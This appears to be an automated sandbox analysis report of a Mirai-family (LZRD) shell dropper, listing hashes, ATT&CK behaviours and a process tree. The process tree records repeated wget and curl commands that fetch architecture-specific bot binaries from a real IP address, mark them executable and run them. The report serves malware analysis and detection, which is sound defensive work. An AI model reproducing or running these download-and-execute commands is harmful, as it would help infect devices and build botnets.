Analysis
-
max time kernel
149s -
max time network
153s -
platform
ubuntu-18.04_amd64 -
resource
ubuntu1804-amd64-20240611-en -
resource tags
arch:amd64arch:i386image:ubuntu1804-amd64-20240611-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system -
submitted
10-11-2024 02:45
Static task
static1
Behavioral task
behavioral1
Sample
951f2e24a8f4c1102b1b8b707e3b5610e83f3a40f94c6b6fe6ba17e3ed33c7ed.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
951f2e24a8f4c1102b1b8b707e3b5610e83f3a40f94c6b6fe6ba17e3ed33c7ed.sh
Resource
debian9-armhf-20240418-en
Behavioral task
behavioral3
Sample
951f2e24a8f4c1102b1b8b707e3b5610e83f3a40f94c6b6fe6ba17e3ed33c7ed.sh
Resource
debian9-mipsbe-20240418-en
General
-
Target
951f2e24a8f4c1102b1b8b707e3b5610e83f3a40f94c6b6fe6ba17e3ed33c7ed.sh
-
Size
2KB
-
MD5
f0daa2dd315e06f5d6dc4b15fa4cdea9
-
SHA1
23761746f0128a46fb08f77ba85047bf27402b32
-
SHA256
951f2e24a8f4c1102b1b8b707e3b5610e83f3a40f94c6b6fe6ba17e3ed33c7ed
-
SHA512
c198adb63fc6f58d09fa2e34c34ab9b8da63b45d3536ee881a5ddb2c8bccf78fc0550f1863b3fc6e15574aca46ea460e70f75d9c182524448f92960f4768bfac
Malware Config
Extracted
mirai
LZRD
Extracted
mirai
LZRD
Signatures
-
Mirai family
-
File and Directory Permissions Modification 1 TTPs 15 IoCs
Adversaries may modify file or directory permissions to evade defenses.
Processes:
chmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodpid Process 1542 chmod 1604 chmod 1634 chmod 1654 chmod 1522 chmod 1584 chmod 1644 chmod 1552 chmod 1562 chmod 1614 chmod 1624 chmod 1516 chmod 1532 chmod 1574 chmod 1594 chmod -
Executes dropped EXE 15 IoCs
Processes:
ChaoticChaoticChaoticChaoticChaoticChaoticChaoticChaoticChaoticChaoticChaoticChaoticChaoticChaoticChaoticioc pid Process /tmp/Chaotic 1517 Chaotic /tmp/Chaotic 1523 Chaotic /tmp/Chaotic 1533 Chaotic /tmp/Chaotic 1543 Chaotic /tmp/Chaotic 1553 Chaotic /tmp/Chaotic 1563 Chaotic /tmp/Chaotic 1575 Chaotic /tmp/Chaotic 1585 Chaotic /tmp/Chaotic 1595 Chaotic /tmp/Chaotic 1605 Chaotic /tmp/Chaotic 1615 Chaotic /tmp/Chaotic 1625 Chaotic /tmp/Chaotic 1635 Chaotic /tmp/Chaotic 1645 Chaotic /tmp/Chaotic 1655 Chaotic -
Modifies Watchdog functionality 1 TTPs 28 IoCs
Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.
Processes:
ChaoticChaoticChaoticChaoticChaoticChaoticChaoticChaoticChaoticChaoticChaoticChaoticChaoticChaoticdescription ioc Process File opened for modification /dev/misc/watchdog Chaotic File opened for modification /dev/watchdog Chaotic File opened for modification /dev/watchdog Chaotic File opened for modification /dev/misc/watchdog Chaotic File opened for modification /dev/misc/watchdog Chaotic File opened for modification /dev/watchdog Chaotic File opened for modification /dev/watchdog Chaotic File opened for modification /dev/watchdog Chaotic File opened for modification /dev/misc/watchdog Chaotic File opened for modification /dev/misc/watchdog Chaotic File opened for modification /dev/watchdog Chaotic File opened for modification /dev/watchdog Chaotic File opened for modification /dev/watchdog Chaotic File opened for modification /dev/watchdog Chaotic File opened for modification /dev/misc/watchdog Chaotic File opened for modification /dev/misc/watchdog Chaotic File opened for modification /dev/watchdog Chaotic File opened for modification /dev/misc/watchdog Chaotic File opened for modification /dev/watchdog Chaotic File opened for modification /dev/misc/watchdog Chaotic File opened for modification /dev/misc/watchdog Chaotic File opened for modification /dev/misc/watchdog Chaotic File opened for modification /dev/misc/watchdog Chaotic File opened for modification /dev/watchdog Chaotic File opened for modification /dev/watchdog Chaotic File opened for modification /dev/misc/watchdog Chaotic File opened for modification /dev/misc/watchdog Chaotic File opened for modification /dev/watchdog Chaotic -
Enumerates running processes
Discovers information about currently running processes on the system
-
Writes file to system bin folder 28 IoCs
Processes:
ChaoticChaoticChaoticChaoticChaoticChaoticChaoticChaoticChaoticChaoticChaoticChaoticChaoticChaoticdescription ioc Process File opened for modification /bin/watchdog Chaotic File opened for modification /sbin/watchdog Chaotic File opened for modification /sbin/watchdog Chaotic File opened for modification /bin/watchdog Chaotic File opened for modification /sbin/watchdog Chaotic File opened for modification /sbin/watchdog Chaotic File opened for modification /sbin/watchdog Chaotic File opened for modification /bin/watchdog Chaotic File opened for modification /sbin/watchdog Chaotic File opened for modification /bin/watchdog Chaotic File opened for modification /bin/watchdog Chaotic File opened for modification /bin/watchdog Chaotic File opened for modification /sbin/watchdog Chaotic File opened for modification /sbin/watchdog Chaotic File opened for modification /sbin/watchdog Chaotic File opened for modification /bin/watchdog Chaotic File opened for modification /sbin/watchdog Chaotic File opened for modification /bin/watchdog Chaotic File opened for modification /sbin/watchdog Chaotic File opened for modification /bin/watchdog Chaotic File opened for modification /bin/watchdog Chaotic File opened for modification /sbin/watchdog Chaotic File opened for modification /bin/watchdog Chaotic File opened for modification /sbin/watchdog Chaotic File opened for modification /bin/watchdog Chaotic File opened for modification /bin/watchdog Chaotic File opened for modification /sbin/watchdog Chaotic File opened for modification /bin/watchdog Chaotic -
Processes:
resource yara_rule behavioral1/files/fstream-5.dat upx -
Processes:
ChaoticChaoticChaoticChaoticChaoticChaoticChaoticChaoticChaoticChaoticChaoticChaoticChaoticdescription ioc Process File opened for reading /proc/168/status Chaotic File opened for reading /proc/25/status Chaotic File opened for reading /proc/1165/status Chaotic File opened for reading /proc/1509/status Chaotic File opened for reading /proc/28/status Chaotic File opened for reading /proc/163/status Chaotic File opened for reading /proc/1598/status Chaotic File opened for reading /proc/156/status Chaotic File opened for reading /proc/1566/status Chaotic File opened for reading /proc/1352/status Chaotic File opened for reading /proc/197/status Chaotic File opened for reading /proc/1507/status Chaotic File opened for reading /proc/1556/status Chaotic File opened for reading /proc/1132/status Chaotic File opened for reading /proc/31/status Chaotic File opened for reading /proc/674/status Chaotic File opened for reading /proc/528/status Chaotic File opened for reading /proc/1608/status Chaotic File opened for reading /proc/153/status Chaotic File opened for reading /proc/78/status Chaotic File opened for reading /proc/1157/status Chaotic File opened for reading /proc/4/status Chaotic File opened for reading /proc/167/status Chaotic File opened for reading /proc/16/status Chaotic File opened for reading /proc/1655/status Chaotic File opened for reading /proc/23/status Chaotic File opened for reading /proc/981/status Chaotic File opened for reading /proc/1509/status Chaotic File opened for reading /proc/466/status Chaotic File opened for reading /proc/156/status Chaotic File opened for reading /proc/1140/status Chaotic File opened for reading /proc/1089/status Chaotic File opened for reading /proc/267/status Chaotic File opened for reading /proc/683/status Chaotic File opened for reading /proc/17/status Chaotic File opened for reading /proc/481/status Chaotic File opened for reading /proc/662/status Chaotic File opened for reading /proc/156/status Chaotic File opened for reading /proc/674/status Chaotic File opened for reading /proc/685/status Chaotic File opened for reading /proc/651/status Chaotic File opened for reading /proc/20/status Chaotic File opened for reading /proc/154/status Chaotic File opened for reading /proc/927/status Chaotic File opened for reading /proc/1082/status Chaotic File opened for reading /proc/1205/status Chaotic File opened for reading /proc/36/status Chaotic File opened for reading /proc/167/status Chaotic File opened for reading /proc/1119/status Chaotic File opened for reading /proc/1162/status Chaotic File opened for reading /proc/26/status Chaotic File opened for reading /proc/939/status Chaotic File opened for reading /proc/1558/status Chaotic File opened for reading /proc/29/status Chaotic File opened for reading /proc/554/status Chaotic File opened for reading /proc/550/status Chaotic File opened for reading /proc/158/status Chaotic File opened for reading /proc/1175/status Chaotic File opened for reading /proc/1566/status Chaotic File opened for reading /proc/154/status Chaotic File opened for reading /proc/1190/status Chaotic File opened for reading /proc/1030/status Chaotic File opened for reading /proc/89/status Chaotic File opened for reading /proc/165/status Chaotic -
System Network Configuration Discovery 1 TTPs 4 IoCs
Adversaries may gather information about the network configuration of a system.
Processes:
wgetcurlwgetcurlpid Process 1549 wget 1550 curl 1559 wget 1560 curl -
Writes file to tmp directory 30 IoCs
Malware often drops required files in the /tmp directory.
Processes:
curlwgetcurlcurlwgetcurlwgetwget951f2e24a8f4c1102b1b8b707e3b5610e83f3a40f94c6b6fe6ba17e3ed33c7ed.shwgetwgetcpwgetcurlwgetcurlwgetcurlcurlcurlcurlcurlcurlwgetcurlcurlcurlwgetwgetwgetdescription ioc Process File opened for modification /tmp/camp.mips64 curl File opened for modification /tmp/camp.mpsl wget File opened for modification /tmp/camp.sparc curl File opened for modification /tmp/camp.arc curl File opened for modification /tmp/camp.mips wget File opened for modification /tmp/camp.arm5 curl File opened for modification /tmp/camp.arm6 wget File opened for modification /tmp/camp.sh4 wget File opened for modification /tmp/Chaotic 951f2e24a8f4c1102b1b8b707e3b5610e83f3a40f94c6b6fe6ba17e3ed33c7ed.sh File opened for modification /tmp/camp.arc wget File opened for modification /tmp/camp.arm5 wget File opened for modification /tmp/busybox cp File opened for modification /tmp/camp.x86_64 wget File opened for modification /tmp/camp.x86_64 curl File opened for modification /tmp/camp.arm7 wget File opened for modification /tmp/camp.arm7 curl File opened for modification /tmp/camp.x86 wget File opened for modification /tmp/camp.arm6 curl File opened for modification /tmp/camp.m68k curl File opened for modification /tmp/camp.sh4 curl File opened for modification /tmp/camp.mips curl File opened for modification /tmp/camp.mpsl curl File opened for modification /tmp/camp.arm curl File opened for modification /tmp/camp.ppc wget File opened for modification /tmp/camp.ppc curl File opened for modification /tmp/camp.x86 curl File opened for modification /tmp/camp.i686 curl File opened for modification /tmp/camp.arm wget File opened for modification /tmp/camp.m68k wget File opened for modification /tmp/camp.i686 wget
Processes
-
/tmp/951f2e24a8f4c1102b1b8b707e3b5610e83f3a40f94c6b6fe6ba17e3ed33c7ed.sh/tmp/951f2e24a8f4c1102b1b8b707e3b5610e83f3a40f94c6b6fe6ba17e3ed33c7ed.sh1⤵
- Writes file to tmp directory
PID:1507 -
/bin/cpcp /bin/busybox /tmp/2⤵
- Writes file to tmp directory
PID:1508
-
-
/usr/bin/wgetwget http://198.12.107.126/bins/camp.arc2⤵
- Writes file to tmp directory
PID:1512
-
-
/usr/bin/curlcurl -O http://198.12.107.126/bins/camp.arc2⤵
- Writes file to tmp directory
PID:1514
-
-
/bin/catcat camp.arc2⤵PID:1515
-
-
/bin/chmodchmod +x 951f2e24a8f4c1102b1b8b707e3b5610e83f3a40f94c6b6fe6ba17e3ed33c7ed.sh busybox camp.arc Chaotic config-err-C9zgZS netplan_yfbt283b snap-private-tmp ssh-f0CRRAAB6NyY systemd-private-0779bd6fdccd4079b4778a22e5750cd8-bolt.service-m8MTGh systemd-private-0779bd6fdccd4079b4778a22e5750cd8-colord.service-QwzSFh systemd-private-0779bd6fdccd4079b4778a22e5750cd8-ModemManager.service-CVp8sg systemd-private-0779bd6fdccd4079b4778a22e5750cd8-systemd-resolved.service-EBNwMH systemd-private-0779bd6fdccd4079b4778a22e5750cd8-systemd-timedated.service-qSrSsR2⤵
- File and Directory Permissions Modification
PID:1516
-
-
/tmp/Chaotic./Chaotic2⤵
- Executes dropped EXE
PID:1517
-
-
/usr/bin/wgetwget http://198.12.107.126/bins/camp.x862⤵
- Writes file to tmp directory
PID:1519
-
-
/usr/bin/curlcurl -O http://198.12.107.126/bins/camp.x862⤵
- Writes file to tmp directory
PID:1520
-
-
/bin/catcat camp.x862⤵PID:1521
-
-
/bin/chmodchmod +x 951f2e24a8f4c1102b1b8b707e3b5610e83f3a40f94c6b6fe6ba17e3ed33c7ed.sh busybox camp.arc camp.x86 Chaotic config-err-C9zgZS netplan_yfbt283b snap-private-tmp ssh-f0CRRAAB6NyY systemd-private-0779bd6fdccd4079b4778a22e5750cd8-bolt.service-m8MTGh systemd-private-0779bd6fdccd4079b4778a22e5750cd8-colord.service-QwzSFh systemd-private-0779bd6fdccd4079b4778a22e5750cd8-ModemManager.service-CVp8sg systemd-private-0779bd6fdccd4079b4778a22e5750cd8-systemd-resolved.service-EBNwMH systemd-private-0779bd6fdccd4079b4778a22e5750cd8-systemd-timedated.service-qSrSsR2⤵
- File and Directory Permissions Modification
PID:1522
-
-
/tmp/Chaotic./Chaotic2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Writes file to system bin folder
- Reads runtime system information
PID:1523
-
-
/usr/bin/wgetwget http://198.12.107.126/bins/camp.x86_642⤵
- Writes file to tmp directory
PID:1529
-
-
/usr/bin/curlcurl -O http://198.12.107.126/bins/camp.x86_642⤵
- Writes file to tmp directory
PID:1530
-
-
/bin/chmodchmod +x 951f2e24a8f4c1102b1b8b707e3b5610e83f3a40f94c6b6fe6ba17e3ed33c7ed.sh busybox camp.arc camp.x86 camp.x86_64 Chaotic config-err-C9zgZS netplan_yfbt283b snap-private-tmp ssh-f0CRRAAB6NyY systemd-private-0779bd6fdccd4079b4778a22e5750cd8-bolt.service-m8MTGh systemd-private-0779bd6fdccd4079b4778a22e5750cd8-colord.service-QwzSFh systemd-private-0779bd6fdccd4079b4778a22e5750cd8-ModemManager.service-CVp8sg systemd-private-0779bd6fdccd4079b4778a22e5750cd8-systemd-resolved.service-EBNwMH systemd-private-0779bd6fdccd4079b4778a22e5750cd8-systemd-timedated.service-qSrSsR2⤵
- File and Directory Permissions Modification
PID:1532
-
-
/tmp/Chaotic./Chaotic2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Writes file to system bin folder
- Reads runtime system information
PID:1533
-
-
/usr/bin/wgetwget http://198.12.107.126/bins/camp.i6862⤵
- Writes file to tmp directory
PID:1539
-
-
/usr/bin/curlcurl -O http://198.12.107.126/bins/camp.i6862⤵
- Writes file to tmp directory
PID:1540
-
-
/bin/chmodchmod +x 951f2e24a8f4c1102b1b8b707e3b5610e83f3a40f94c6b6fe6ba17e3ed33c7ed.sh busybox camp.arc camp.i686 camp.x86 camp.x86_64 Chaotic config-err-C9zgZS netplan_yfbt283b snap-private-tmp ssh-f0CRRAAB6NyY systemd-private-0779bd6fdccd4079b4778a22e5750cd8-bolt.service-m8MTGh systemd-private-0779bd6fdccd4079b4778a22e5750cd8-colord.service-QwzSFh systemd-private-0779bd6fdccd4079b4778a22e5750cd8-ModemManager.service-CVp8sg systemd-private-0779bd6fdccd4079b4778a22e5750cd8-systemd-resolved.service-EBNwMH systemd-private-0779bd6fdccd4079b4778a22e5750cd8-systemd-timedated.service-qSrSsR2⤵
- File and Directory Permissions Modification
PID:1542
-
-
/tmp/Chaotic./Chaotic2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Writes file to system bin folder
- Reads runtime system information
PID:1543
-
-
/usr/bin/wgetwget http://198.12.107.126/bins/camp.mips2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:1549
-
-
/usr/bin/curlcurl -O http://198.12.107.126/bins/camp.mips2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:1550
-
-
/bin/chmodchmod +x 951f2e24a8f4c1102b1b8b707e3b5610e83f3a40f94c6b6fe6ba17e3ed33c7ed.sh busybox camp.arc camp.i686 camp.mips camp.x86 camp.x86_64 Chaotic config-err-C9zgZS netplan_yfbt283b snap-private-tmp ssh-f0CRRAAB6NyY systemd-private-0779bd6fdccd4079b4778a22e5750cd8-bolt.service-m8MTGh systemd-private-0779bd6fdccd4079b4778a22e5750cd8-colord.service-QwzSFh systemd-private-0779bd6fdccd4079b4778a22e5750cd8-ModemManager.service-CVp8sg systemd-private-0779bd6fdccd4079b4778a22e5750cd8-systemd-resolved.service-EBNwMH systemd-private-0779bd6fdccd4079b4778a22e5750cd8-systemd-timedated.service-qSrSsR2⤵
- File and Directory Permissions Modification
PID:1552
-
-
/tmp/Chaotic./Chaotic2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Writes file to system bin folder
- Reads runtime system information
PID:1553
-
-
/usr/bin/wgetwget http://198.12.107.126/bins/camp.mips642⤵
- System Network Configuration Discovery
PID:1559
-
-
/usr/bin/curlcurl -O http://198.12.107.126/bins/camp.mips642⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:1560
-
-
/bin/chmodchmod +x 951f2e24a8f4c1102b1b8b707e3b5610e83f3a40f94c6b6fe6ba17e3ed33c7ed.sh busybox camp.arc camp.i686 camp.mips camp.mips64 camp.x86 camp.x86_64 Chaotic config-err-C9zgZS netplan_yfbt283b snap-private-tmp ssh-f0CRRAAB6NyY systemd-private-0779bd6fdccd4079b4778a22e5750cd8-bolt.service-m8MTGh systemd-private-0779bd6fdccd4079b4778a22e5750cd8-colord.service-QwzSFh systemd-private-0779bd6fdccd4079b4778a22e5750cd8-ModemManager.service-CVp8sg systemd-private-0779bd6fdccd4079b4778a22e5750cd8-systemd-resolved.service-EBNwMH systemd-private-0779bd6fdccd4079b4778a22e5750cd8-systemd-timedated.service-qSrSsR2⤵
- File and Directory Permissions Modification
PID:1562
-
-
/tmp/Chaotic./Chaotic2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Writes file to system bin folder
- Reads runtime system information
PID:1563
-
-
/usr/bin/wgetwget http://198.12.107.126/bins/camp.mpsl2⤵
- Writes file to tmp directory
PID:1571
-
-
/usr/bin/curlcurl -O http://198.12.107.126/bins/camp.mpsl2⤵
- Writes file to tmp directory
PID:1572
-
-
/bin/chmodchmod +x 951f2e24a8f4c1102b1b8b707e3b5610e83f3a40f94c6b6fe6ba17e3ed33c7ed.sh busybox camp.arc camp.i686 camp.mips camp.mips64 camp.mpsl camp.x86 camp.x86_64 Chaotic config-err-C9zgZS netplan_yfbt283b snap-private-tmp ssh-f0CRRAAB6NyY systemd-private-0779bd6fdccd4079b4778a22e5750cd8-bolt.service-m8MTGh systemd-private-0779bd6fdccd4079b4778a22e5750cd8-colord.service-QwzSFh systemd-private-0779bd6fdccd4079b4778a22e5750cd8-ModemManager.service-CVp8sg systemd-private-0779bd6fdccd4079b4778a22e5750cd8-systemd-resolved.service-EBNwMH2⤵
- File and Directory Permissions Modification
PID:1574
-
-
/tmp/Chaotic./Chaotic2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Writes file to system bin folder
- Reads runtime system information
PID:1575
-
-
/usr/bin/wgetwget http://198.12.107.126/bins/camp.arm2⤵
- Writes file to tmp directory
PID:1581
-
-
/usr/bin/curlcurl -O http://198.12.107.126/bins/camp.arm2⤵
- Writes file to tmp directory
PID:1582
-
-
/bin/chmodchmod +x 951f2e24a8f4c1102b1b8b707e3b5610e83f3a40f94c6b6fe6ba17e3ed33c7ed.sh busybox camp.arc camp.arm camp.i686 camp.mips camp.mips64 camp.mpsl camp.x86 camp.x86_64 Chaotic config-err-C9zgZS netplan_yfbt283b snap-private-tmp ssh-f0CRRAAB6NyY systemd-private-0779bd6fdccd4079b4778a22e5750cd8-bolt.service-m8MTGh systemd-private-0779bd6fdccd4079b4778a22e5750cd8-colord.service-QwzSFh systemd-private-0779bd6fdccd4079b4778a22e5750cd8-ModemManager.service-CVp8sg systemd-private-0779bd6fdccd4079b4778a22e5750cd8-systemd-resolved.service-EBNwMH2⤵
- File and Directory Permissions Modification
PID:1584
-
-
/tmp/Chaotic./Chaotic2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Writes file to system bin folder
- Reads runtime system information
PID:1585
-
-
/usr/bin/wgetwget http://198.12.107.126/bins/camp.arm52⤵
- Writes file to tmp directory
PID:1591
-
-
/usr/bin/curlcurl -O http://198.12.107.126/bins/camp.arm52⤵
- Writes file to tmp directory
PID:1592
-
-
/bin/chmodchmod +x 951f2e24a8f4c1102b1b8b707e3b5610e83f3a40f94c6b6fe6ba17e3ed33c7ed.sh busybox camp.arc camp.arm camp.arm5 camp.i686 camp.mips camp.mips64 camp.mpsl camp.x86 camp.x86_64 Chaotic config-err-C9zgZS netplan_yfbt283b snap-private-tmp ssh-f0CRRAAB6NyY systemd-private-0779bd6fdccd4079b4778a22e5750cd8-bolt.service-m8MTGh systemd-private-0779bd6fdccd4079b4778a22e5750cd8-colord.service-QwzSFh systemd-private-0779bd6fdccd4079b4778a22e5750cd8-ModemManager.service-CVp8sg systemd-private-0779bd6fdccd4079b4778a22e5750cd8-systemd-resolved.service-EBNwMH2⤵
- File and Directory Permissions Modification
PID:1594
-
-
/tmp/Chaotic./Chaotic2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Writes file to system bin folder
PID:1595
-
-
/usr/bin/wgetwget http://198.12.107.126/bins/camp.arm62⤵
- Writes file to tmp directory
PID:1601
-
-
/usr/bin/curlcurl -O http://198.12.107.126/bins/camp.arm62⤵
- Writes file to tmp directory
PID:1602
-
-
/bin/chmodchmod +x 951f2e24a8f4c1102b1b8b707e3b5610e83f3a40f94c6b6fe6ba17e3ed33c7ed.sh busybox camp.arc camp.arm camp.arm5 camp.arm6 camp.i686 camp.mips camp.mips64 camp.mpsl camp.x86 camp.x86_64 Chaotic config-err-C9zgZS netplan_yfbt283b snap-private-tmp ssh-f0CRRAAB6NyY systemd-private-0779bd6fdccd4079b4778a22e5750cd8-bolt.service-m8MTGh systemd-private-0779bd6fdccd4079b4778a22e5750cd8-colord.service-QwzSFh systemd-private-0779bd6fdccd4079b4778a22e5750cd8-ModemManager.service-CVp8sg systemd-private-0779bd6fdccd4079b4778a22e5750cd8-systemd-resolved.service-EBNwMH2⤵
- File and Directory Permissions Modification
PID:1604
-
-
/tmp/Chaotic./Chaotic2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Writes file to system bin folder
- Reads runtime system information
PID:1605
-
-
/usr/bin/wgetwget http://198.12.107.126/bins/camp.arm72⤵
- Writes file to tmp directory
PID:1611
-
-
/usr/bin/curlcurl -O http://198.12.107.126/bins/camp.arm72⤵
- Writes file to tmp directory
PID:1612
-
-
/bin/chmodchmod +x 951f2e24a8f4c1102b1b8b707e3b5610e83f3a40f94c6b6fe6ba17e3ed33c7ed.sh busybox camp.arc camp.arm camp.arm5 camp.arm6 camp.arm7 camp.i686 camp.mips camp.mips64 camp.mpsl camp.x86 camp.x86_64 Chaotic config-err-C9zgZS netplan_yfbt283b snap-private-tmp ssh-f0CRRAAB6NyY systemd-private-0779bd6fdccd4079b4778a22e5750cd8-bolt.service-m8MTGh systemd-private-0779bd6fdccd4079b4778a22e5750cd8-colord.service-QwzSFh systemd-private-0779bd6fdccd4079b4778a22e5750cd8-ModemManager.service-CVp8sg systemd-private-0779bd6fdccd4079b4778a22e5750cd8-systemd-resolved.service-EBNwMH2⤵
- File and Directory Permissions Modification
PID:1614
-
-
/tmp/Chaotic./Chaotic2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Writes file to system bin folder
- Reads runtime system information
PID:1615
-
-
/usr/bin/wgetwget http://198.12.107.126/bins/camp.ppc2⤵
- Writes file to tmp directory
PID:1621
-
-
/usr/bin/curlcurl -O http://198.12.107.126/bins/camp.ppc2⤵
- Writes file to tmp directory
PID:1622
-
-
/bin/chmodchmod +x 951f2e24a8f4c1102b1b8b707e3b5610e83f3a40f94c6b6fe6ba17e3ed33c7ed.sh busybox camp.arc camp.arm camp.arm5 camp.arm6 camp.arm7 camp.i686 camp.mips camp.mips64 camp.mpsl camp.ppc camp.x86 camp.x86_64 Chaotic config-err-C9zgZS netplan_yfbt283b snap-private-tmp ssh-f0CRRAAB6NyY systemd-private-0779bd6fdccd4079b4778a22e5750cd8-bolt.service-m8MTGh systemd-private-0779bd6fdccd4079b4778a22e5750cd8-colord.service-QwzSFh systemd-private-0779bd6fdccd4079b4778a22e5750cd8-ModemManager.service-CVp8sg systemd-private-0779bd6fdccd4079b4778a22e5750cd8-systemd-resolved.service-EBNwMH2⤵
- File and Directory Permissions Modification
PID:1624
-
-
/tmp/Chaotic./Chaotic2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Writes file to system bin folder
- Reads runtime system information
PID:1625
-
-
/usr/bin/wgetwget http://198.12.107.126/bins/camp.sparc2⤵PID:1631
-
-
/usr/bin/curlcurl -O http://198.12.107.126/bins/camp.sparc2⤵
- Writes file to tmp directory
PID:1632
-
-
/bin/chmodchmod +x 951f2e24a8f4c1102b1b8b707e3b5610e83f3a40f94c6b6fe6ba17e3ed33c7ed.sh busybox camp.arc camp.arm camp.arm5 camp.arm6 camp.arm7 camp.i686 camp.mips camp.mips64 camp.mpsl camp.ppc camp.sparc camp.x86 camp.x86_64 Chaotic config-err-C9zgZS netplan_yfbt283b snap-private-tmp ssh-f0CRRAAB6NyY systemd-private-0779bd6fdccd4079b4778a22e5750cd8-bolt.service-m8MTGh systemd-private-0779bd6fdccd4079b4778a22e5750cd8-colord.service-QwzSFh systemd-private-0779bd6fdccd4079b4778a22e5750cd8-ModemManager.service-CVp8sg systemd-private-0779bd6fdccd4079b4778a22e5750cd8-systemd-resolved.service-EBNwMH2⤵
- File and Directory Permissions Modification
PID:1634
-
-
/tmp/Chaotic./Chaotic2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Writes file to system bin folder
- Reads runtime system information
PID:1635
-
-
/usr/bin/wgetwget http://198.12.107.126/bins/camp.m68k2⤵
- Writes file to tmp directory
PID:1641
-
-
/usr/bin/curlcurl -O http://198.12.107.126/bins/camp.m68k2⤵
- Writes file to tmp directory
PID:1642
-
-
/bin/chmodchmod +x 951f2e24a8f4c1102b1b8b707e3b5610e83f3a40f94c6b6fe6ba17e3ed33c7ed.sh busybox camp.arc camp.arm camp.arm5 camp.arm6 camp.arm7 camp.i686 camp.m68k camp.mips camp.mips64 camp.mpsl camp.ppc camp.sparc camp.x86 camp.x86_64 Chaotic config-err-C9zgZS netplan_yfbt283b snap-private-tmp ssh-f0CRRAAB6NyY systemd-private-0779bd6fdccd4079b4778a22e5750cd8-bolt.service-m8MTGh systemd-private-0779bd6fdccd4079b4778a22e5750cd8-colord.service-QwzSFh systemd-private-0779bd6fdccd4079b4778a22e5750cd8-ModemManager.service-CVp8sg systemd-private-0779bd6fdccd4079b4778a22e5750cd8-systemd-resolved.service-EBNwMH2⤵
- File and Directory Permissions Modification
PID:1644
-
-
/tmp/Chaotic./Chaotic2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Writes file to system bin folder
- Reads runtime system information
PID:1645
-
-
/usr/bin/wgetwget http://198.12.107.126/bins/camp.sh42⤵
- Writes file to tmp directory
PID:1651
-
-
/usr/bin/curlcurl -O http://198.12.107.126/bins/camp.sh42⤵
- Writes file to tmp directory
PID:1652
-
-
/bin/chmodchmod +x 951f2e24a8f4c1102b1b8b707e3b5610e83f3a40f94c6b6fe6ba17e3ed33c7ed.sh busybox camp.arc camp.arm camp.arm5 camp.arm6 camp.arm7 camp.i686 camp.m68k camp.mips camp.mips64 camp.mpsl camp.ppc camp.sh4 camp.sparc camp.x86 camp.x86_64 Chaotic config-err-C9zgZS netplan_yfbt283b snap-private-tmp ssh-f0CRRAAB6NyY systemd-private-0779bd6fdccd4079b4778a22e5750cd8-bolt.service-m8MTGh systemd-private-0779bd6fdccd4079b4778a22e5750cd8-colord.service-QwzSFh systemd-private-0779bd6fdccd4079b4778a22e5750cd8-ModemManager.service-CVp8sg systemd-private-0779bd6fdccd4079b4778a22e5750cd8-systemd-resolved.service-EBNwMH2⤵
- File and Directory Permissions Modification
PID:1654
-
-
/tmp/Chaotic./Chaotic2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Writes file to system bin folder
- Reads runtime system information
PID:1655
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
34KB
MD5dac9f1dcafdb77db0d0ff1be1e704b1e
SHA1e83605a050e0aaad3dba360545a00036f083eb91
SHA2567fd32ee1c25ade0f67fc93e797707d956ee74c36c44c93ea8e3f00a0085e938d
SHA512e2869500ed728e8a63947e541dc5c04edb9d581862715863334195d87f35c5207de8db7e23affe8113b2029ddbffd92364491e4291c53ecc4664fcc0244a0571
-
Filesize
2.0MB
MD5b4dede5fc0b1bad5cb8e901bde126b97
SHA110cbe9a418ad84a1ed297948539d37aeb58dd810
SHA256a9f0735d28f9a6a4f2634d3b144156f7b3df3b476a16a5ab0c7bdf98d74dd020
SHA51245665ce3a42f63a01fdef517e0c4cb943efce64c8a32d3ce07ab4f1fafc23cda77f378d324342efc79dc9d2293c4b4454d06c1cf4997b9e866784de01cb546e6
-
Filesize
113KB
MD536a7a1e959eaf7d6896505777912ecdf
SHA14f9a1f8cc82036f0ffb90c6dc1c5093bca499919
SHA2565111947e9ff3b6280e4ba90b172bf864838492b0b48d640be41f51be427c44ca
SHA51277acb1b88c40e0f91b4ec44216b3b49161a892f6bbca2cb09fe82be1ba7f5b469008f655b46473ba53734d2610863b98f97ac3a54475837867efc3e156bf2fb0